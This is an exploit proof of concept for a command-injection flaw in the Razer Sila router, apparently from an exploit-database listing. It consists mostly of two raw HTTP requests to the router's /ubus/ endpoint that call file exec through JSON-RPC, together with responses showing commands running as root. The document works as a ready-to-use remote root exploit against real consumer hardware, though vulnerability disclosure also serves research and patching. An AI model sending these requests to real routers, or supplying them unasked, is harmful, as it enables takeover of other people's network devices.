# Exploit Title: Razer Sila - Command Injection # Google Dork: N/A # Date: 4/9/2022 # Exploit Author: Kevin Randall # Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Version: RazerSila-2.0.441_api-2.0.418 # Tested on: Razer Sila Router # CVE N/A # Proof of Concept # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 117 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]} # Response HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 85 {"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]} # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 117 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]} # Response HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 172 {"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]}